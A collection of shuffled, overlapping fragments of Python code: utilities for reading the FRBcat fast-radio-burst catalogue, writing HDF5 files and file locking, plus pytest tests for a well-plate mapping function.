"GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded",
"'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM,",
"'null' ) : continue if RM and ( row[i_RM] == 'null' ) :",
"True, print number of extractet FRBs Returns ------- FRBs : array structured numpy.array",
"def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd,",
"reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes]",
"np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string,",
"print_function import sys, h5py as h5, numpy as np, yt, csv from time",
"i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering'",
"fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking.",
") sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'),",
"time()-t0 ) ) return res return MeasureTime() from time import sleep ## wrapper",
"as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout",
"file that tells whether the lock is active ## perform action on the",
"timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time()",
"took %i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional )",
"3 >>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc",
"\"locktest\" is a temporary file that tells whether the lock is active ##",
"as np, yt, csv from time import time, sleep from PreFRBLE.file_system import *",
"observed with RM tau : boolean if True, only return FRBs observed with",
"np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal =",
"FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] )",
"np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper to",
"( row[i_tau] == 'null' ) : continue if RM and ( row[i_RM] ==",
"print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime()",
"= 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header",
"allow for parallel computation. Use with caution, might corrupt nodes in your h5",
"item in the `iterable` that satisfies the `condition`. If the condition is not",
"in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in",
"in iterable if condition(x)) except: return -1 ## wrapper to show time needed",
"and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue",
"except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1 pass",
"start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired!",
"if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not",
"1 pass else: print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat",
"'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header",
"elif measure == 'RM': return FRBs['RM'] ## flocker to keep parallel processes from",
"\"\"\" ### read all FRBs from FRBcat ### optional: read only those FRBs",
"considered telescopes, FRBs of other telescopes are ignored RM : boolean if True,",
"== 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID,",
"performed ''' def first(iterable, condition = lambda x: True): \"\"\" Returns the first",
"parallel computation. Use with caution, might corrupt nodes in your h5 file. in",
"FRBs observed with temproal broadening print_number : boolean if True, print number of",
"lock is released, then with is performed ''' def first(iterable, condition = lambda",
"taken to compute function \"\"\" def MeasureTime(): t0 = time() res = func(",
"an arbitrary sleep here, but spinning # without a delay is also undesirable.",
"# exists by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with",
"i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode(",
"True): \"\"\" Returns the first item in the `iterable` that satisfies the `condition`.",
"return FRBs observed with RM tau : boolean if True, only return FRBs",
"__enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX",
"dtype='U' ): \"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\" if",
"If the condition is not given, returns the first item of the iterable.",
"return next(x for x in iterable if condition(x)) except: return -1 ## wrapper",
"in zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset(",
"ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is",
"---------- telescopes : list list of considered telescopes, FRBs of other telescopes are",
"np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs",
"nice to avoid an arbitrary sleep here, but spinning # without a delay",
"time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\"",
"without a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd)",
"boolean if True, only return FRBs observed with temproal broadening print_number : boolean",
"of the iterable. Returns -1 if no item satysfing the condition is found.",
"is found. >>> first( (1,2,3), condition=lambda x: x % 2 == 0) 2",
"= time() res = func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__,",
"= time() ret = f( *args, **kwargs ) t = time() - t0",
"return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily",
"= None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True:",
"self._path = path self._timeout = timeout self._fd = None def __enter__(self): self._fd =",
"'RM': return FRBs['RM'] ## flocker to keep parallel processes from writing to same",
"lock file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path",
"Resource temporarily unavailable raise elif self._timeout is not None and time() > (start_lock_search",
"### read all FRBs from FRBcat ### optional: read only those FRBs observed",
"sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to",
"= lambda x: True): \"\"\" Returns the first item in the `iterable` that",
"!= errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not None and",
"[('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')]",
"f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM",
"in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif",
"parallel processes from writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14",
"{} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from time import",
"write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')]",
"): \"\"\" short wrapper to decode byte-strings read from FRBcat \"\"\" if 'f'",
"acquired! return except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource",
"RM and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0],",
"time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from",
"might corrupt nodes in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632",
"number of extractet FRBs Returns ------- FRBs : array structured numpy.array containing values",
"%.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) ) return ret '''",
"i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM,",
"delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd =",
"filename, 'a' ) as f: for data, key in zip( datas, keys ):",
"with caution, might corrupt nodes in your h5 file. in that case, visit:",
") raise # TODO It would be nice to avoid an arbitrary sleep",
"def first(iterable, condition = lambda x: True): \"\"\" Returns the first item in",
"data, key in zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except:",
"from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import time def",
"first item of the iterable. Returns -1 if no item satysfing the condition",
"print_number : boolean if True, print number of extractet FRBs Returns ------- FRBs",
"if tau and ( row[i_tau] == 'null' ) : continue if RM and",
"tau : boolean if True, only return FRBs observed with temproal broadening print_number",
"too hard because it is # unnecessary. This is mostly to help the",
"show time needed for some function ''' def HowLong( f, *args, print_additional='', **kwargs",
"= time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return",
"timeout. print( \"timeout exceeded\" ) raise # TODO It would be nice to",
"don't try too hard because it is # unnecessary. This is mostly to",
"\", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype",
"the `with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self,",
"### small workaround to allow for parallel computation. Use with caution, might corrupt",
"telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to",
")[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal,",
"wrapper to decode byte-strings read from FRBcat \"\"\" if 'f' in dtype: if",
"with starts until its left ## if file is locked, code is paused",
"* from PreFRBLE.parameter import * from time import time def TimeElapsed( func, *args,",
"decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) )",
"numpy as np, yt, csv from time import time, sleep from PreFRBLE.file_system import",
"ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not None",
"minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) ) return",
"< 30: #try: with h5.File( filename, 'a' ) as f: for data, key",
"hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas",
"= csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID =",
"> (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" )",
"FRBs of other telescopes are ignored RM : boolean if True, only return",
"| fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex: if ex.errno",
"FRBs : array structured numpy.array containing values listed in FRBcat \"\"\" ### read",
"sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import time",
"import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based",
"i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit",
"visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with h5.File(",
"with the `with` syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def",
"a temporary file that tells whether the lock is active ## perform action",
"SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking. Intended for use",
") : continue if tau and ( row[i_tau] == 'null' ) : continue",
"first item in the `iterable` that satisfies the `condition`. If the condition is",
"GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read with",
"if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ##",
"\"\"\" Returns the first item in the `iterable` that satisfies the `condition`. If",
"def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys in",
"tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters",
"locked when with starts until its left ## if file is locked, code",
"in the `iterable` that satisfies the `condition`. If the condition is not given,",
"condition is found. >>> first( (1,2,3), condition=lambda x: x % 2 == 0)",
"**kwargs ) t = time() - t0 print( \"Running %s took %i minutes",
"not None and time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout.",
"This is mostly to help the user see whether a lock # exists",
"return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in",
"csv from time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import",
"print( \"Running %s took %i minutes and %.1f seconds %s\" % (f.__name__, t//60,",
"('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def",
"same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class",
"Intended for use with the `with` syntax. It will create/truncate/delete the lock file",
"starts until its left ## if file is locked, code is paused until",
"tries += 1 pass else: print( \"couldn't write \", keys ) sys.exit(1) ##",
"x % 2 == 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3),",
"frbcat_file, 'r') as f: reader = csv.reader( f ) header = np.array(next(reader)) #",
"Returns ------- FRBs : array structured numpy.array containing values listed in FRBcat \"\"\"",
"errno class SimpleFlock: \"\"\"Provides the simplest possible interface to flock-based file locking. Intended",
"is # unnecessary. This is mostly to help the user see whether a",
"of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return",
"os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary",
"if type(keys) is str: sys.exit( 'Write2h5 needs list of datas and keys' )",
": boolean if True, print number of extractet FRBs Returns ------- FRBs :",
"workaround to allow for parallel computation. Use with caution, might corrupt nodes in",
"structured numpy.array containing values listed in FRBcat \"\"\" ### read all FRBs from",
"( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if",
"x: True): \"\"\" Returns the first item in the `iterable` that satisfies the",
"`condition`. If the condition is not given, returns the first item of the",
"0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x >",
"TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if condition(x))",
"for x in iterable if condition(x)) except: return -1 ## wrapper to show",
"broadening print_number : boolean if True, print number of extractet FRBs Returns -------",
"if 'f' in dtype: if 'null' in string: return float('NaN') return float(string) return",
"dtype: if 'null' in string: return float('NaN') return float(string) return string def GetFRBsMeasures(",
"are ignored RM : boolean if True, only return FRBs observed with RM",
"break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write \", keys",
"[] with open( frbcat_file, 'r') as f: reader = csv.reader( f ) header",
"self._fd = None # Try to remove the lock file, but don't try",
"needed to call function f \"\"\" t0 = time() ret = f( *args,",
"computation. Use with caution, might corrupt nodes in your h5 file. in that",
"entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of datas and",
"file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path self._timeout",
"# header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm'",
"possible interface to flock-based file locking. Intended for use with the `with` syntax.",
"\"\"\" returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure",
"== 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where(",
": continue if RM and ( row[i_RM] == 'null' ) : continue FRBs.append(",
"from time import sleep ## wrapper to write hdf5 files consistently def Write2h5(",
"= [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'),",
"try too hard because it is # unnecessary. This is mostly to help",
"is mostly to help the user see whether a lock # exists by",
"Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in iterable if condition(x)) except:",
"FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list of considered telescopes,",
"self._timeout = timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT) start_lock_search",
"'null' in string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None",
"the first item in the `iterable` that satisfies the `condition`. If the condition",
"is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None",
"return res return MeasureTime() from time import sleep ## wrapper to write hdf5",
"# without a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN)",
"not given, returns the first item of the iterable. Returns -1 if no",
"file(s) ## file is locked when with starts until its left ## if",
")[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header ==",
")[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header ==",
"fit order of FRB_dtype for row in reader: if telescopes and ( row[i_tele]",
"np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs,",
"if no item satysfing the condition is found. >>> first( (1,2,3), condition=lambda x:",
"consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys",
"telescopes, FRBs of other telescopes are ignored RM : boolean if True, only",
"header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM = np.where(",
"== 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype",
"as necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path self._timeout =",
"\"\"\" measure time taken to compute function \"\"\" def MeasureTime(): t0 = time()",
"in your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0",
"= np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0]",
">>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9) -1",
"np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM",
"in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype )",
"FRBcat \"\"\" ### read all FRBs from FRBcat ### optional: read only those",
"None): self._path = path self._timeout = timeout self._fd = None def __enter__(self): self._fd",
"header == 'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs =",
"FRBs Returns ------- FRBs : array structured numpy.array containing values listed in FRBcat",
"): \"\"\" returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if",
"\"timeout exceeded\" ) raise # TODO It would be nice to avoid an",
"datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data",
"short wrapper to decode byte-strings read from FRBcat \"\"\" if 'f' in dtype:",
"#FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'),",
"% 2 == 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda",
"os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) #",
"\"Running %s took %i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60,",
"FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype =",
"whether a lock # exists by examining the filesystem. try: os.unlink(self._path) except: pass",
"boolean if True, print number of extractet FRBs Returns ------- FRBs : array",
"h5.File( filename, 'a' ) as f: for data, key in zip( datas, keys",
"for tele in telescopes] ) : continue if tau and ( row[i_tau] ==",
"\"\"\" wrapper to print the time needed to call function f \"\"\" t0",
"RM and tau ### print_number:True print number of extracted FRBs FRBs = []",
"= np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0] i_DM_gal",
"\"\"\" if 'f' in dtype: if 'null' in string: return float('NaN') return float(string)",
"try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break #except:"
] |
[
"'F8', 'D6']: assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and",
"commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow whitespace }",
"test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw errors \"\"\" with pytest.raises(ValueError): _ =",
"== 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized well-IDs are handled",
"# allow whitespace } ) assert True def test_invalid_mapping_spec(): \"\"\" Tests that invalid",
"{'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] ==",
"def test_default_separator(): \"\"\" Tests that the default separator is a period, and that",
"'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized input well mappings work.",
"for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01']",
"well_mapping({'a': ''}) with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a':",
"\"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz'",
"are allowed (even those that are not upper-left corner to bottom-right) \"\"\" result",
"= well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01']",
"Tests that normalized and un-normalized well-IDs are handled for looking up a mix",
"pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def test_backwards_rectangles():",
"\"\"\" Tests that invalid specifications throw errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a':",
"\"\"\" Tests that arbitrary rectangles are allowed (even those that are not upper-left",
"'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', # allow whitespace } ) assert",
"can override the mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo':",
"mix of mapping entries. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}])",
"f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications do not throw an error \"\"\"",
"'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests",
") for i in range(1, 10): assert result[f'A{i}'] == 'foo.bar.baz.qaz' assert result[f'A{i:02d}'] ==",
"'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}] ) for i in range(1, 10):",
"test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for looking up",
"for i in range(1, 10): assert result[f'A{i}'] == 'foo.bar.baz.qaz' assert result[f'A{i:02d}'] == 'foo.bar.baz.qaz'",
"== 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized well-IDs are handled",
"up a single well entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz':",
"result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized and un-normalized well-IDs are",
"\"\"\" Tests that normalized and unnormalized input well mappings work. \"\"\" result =",
"separator=sep) assert result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications do not",
"upper-left corner to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key in ['C4',",
"'A01-G9'}] ) for i in range(1, 10): assert result[f'A{i}'] == 'foo.bar.baz.qaz' assert result[f'A{i:02d}']",
"'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for",
"specifications throw errors \"\"\" with pytest.raises(ValueError): _ = well_mapping({'a': ''}) with pytest.raises(ValueError): _",
"assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized input",
"'a': 'A01', 'b': 'A1', 'c': 'A2,', # allow trailing commas 'd': 'A1-B12', 'e':",
"well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key] ==",
"entry. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}]) assert result['A1'] ==",
"merged together. \"\"\" result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}]) print(result) assert result['A01'] ==",
"up a rectangular mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz':",
"{'qaz': 'A01-G9'}] ) for i in range(1, 10): assert result[f'A{i}'] == 'foo.bar.baz.qaz' assert",
"the default separator is a period, and that conditions are properly merged together.",
"rushd.well_mapper import well_mapping def test_default_separator(): \"\"\" Tests that the default separator is a",
"bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8', 'F4', 'F8',",
"pytest from rushd.well_mapper import well_mapping def test_default_separator(): \"\"\" Tests that the default separator",
"corner to bottom-right) \"\"\" result = well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8',",
") assert True def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw errors \"\"\"",
"a rectangular mapping entry. \"\"\" result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}])",
"with pytest.raises(ValueError): _ = well_mapping({'a': 'Z99'}) with pytest.raises(ValueError): _ = well_mapping({'a': 'A1:A15'}) def",
"test_backwards_rectangles(): \"\"\" Tests that arbitrary rectangles are allowed (even those that are not",
"'A1-A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz'",
"well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}]) assert result['A1'] == 'foo.baz' assert result['A01'] ==",
"print(result) assert result['A01'] == 'foo.bar' def test_custom_separator(): \"\"\" Tests that we can override",
"the mapping separator. \"\"\" for sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar':",
"assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_unnormed_input(): \"\"\" Tests that",
"True def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw errors \"\"\" with pytest.raises(ValueError):",
"test_default_separator(): \"\"\" Tests that the default separator is a period, and that conditions",
"assert result[key] == 'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized well-IDs",
"'foo' def test_normed_and_unnormed_single_well(): \"\"\" Tests that normalized and un-normalized well-IDs are handled for",
"def test_normed_unnormed_input(): \"\"\" Tests that normalized and unnormalized input well mappings work. \"\"\"",
"result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_rectangle(): \"\"\" Tests that normalized",
"un-normalized well-IDs are handled for looking up a mix of mapping entries. \"\"\"",
"= well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8', 'F4', 'F8', 'D6']: assert result[key]",
"separator is a period, and that conditions are properly merged together. \"\"\" result",
"a period, and that conditions are properly merged together. \"\"\" result = well_mapping([{'foo':",
"result['A01'] == f'foo{sep}bar' def test_valid_mapping_spec(): \"\"\" Tests valid specifications do not throw an",
"arbitrary rectangles are allowed (even those that are not upper-left corner to bottom-right)",
"== 'foo.baz' assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\"",
"'b': 'A1', 'c': 'A2,', # allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f':",
"# allow trailing commas 'd': 'A1-B12', 'e': 'A1-B12,C5,C4-F8', 'f': 'A1-B12, C12, D4', #",
"result = well_mapping([{'foo': 'F8-C4'}]) for key in ['C4', 'C8', 'F4', 'F8', 'D6']: assert",
"(even those that are not upper-left corner to bottom-right) \"\"\" result = well_mapping([{'foo':",
"def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications throw errors \"\"\" with pytest.raises(ValueError): _",
"assert result['A01'] == 'foo.baz' assert result['A10'] == 'bar.baz' def test_normed_and_unnormed_mix(): \"\"\" Tests that",
"allow whitespace } ) assert True def test_invalid_mapping_spec(): \"\"\" Tests that invalid specifications",
"sep in r'!@#$%^&*()<>,\\/': result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep) assert result['A01'] ==",
